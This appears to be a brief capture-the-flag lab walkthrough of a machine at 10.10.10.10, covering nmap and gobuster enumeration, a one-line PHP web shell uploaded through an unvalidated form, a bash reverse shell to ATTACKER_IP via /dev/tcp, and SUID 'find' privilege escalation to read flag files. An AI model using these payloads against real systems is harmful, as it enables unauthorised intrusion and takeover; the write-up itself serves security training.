🧠 Overview
Target machine with a vulnerable web application leading to privilege escalation.
🌐 Enumeration
Nmap
nmap -sC -sV -p- 10.10.10.10
Web
http://10.10.10.10
Directory Bruteforce
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
🔍 Initial Access
Discovered an upload functionality.
Upload a simple web shell:
<?php system($_GET['cmd']); ?>
Execute commands:
curl "http://10.10.10.10/uploads/shell.php?cmd=id"
🐚 Reverse Shell
Start listener:
nc -lvnp 4444
Trigger shell:
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Upgrade shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
🔐 Privilege Escalation
SUID Check
find / -perm -4000 2>/dev/null
Exploit
/usr/bin/find . -exec /bin/sh -p \; -quit
📁 Flags
cat /home/user/user.txt
cat /root/root.txt
📸 Screenshot
📊 Notes
- Upload functionality lacked validation
- SUID binaries exposed privilege escalation path
- Always check GTFOBins for exploitation vectors
📌 Quick Commands
whoami
id
uname -a
🧩 Inline Example
Use sudo -l to check privileges.
📋 Summary
| Phase | Technique |
|---|---|
| Recon | Nmap |
| Access | File Upload |
| Shell | Reverse Shell |
| PrivEsc | SUID Exploit |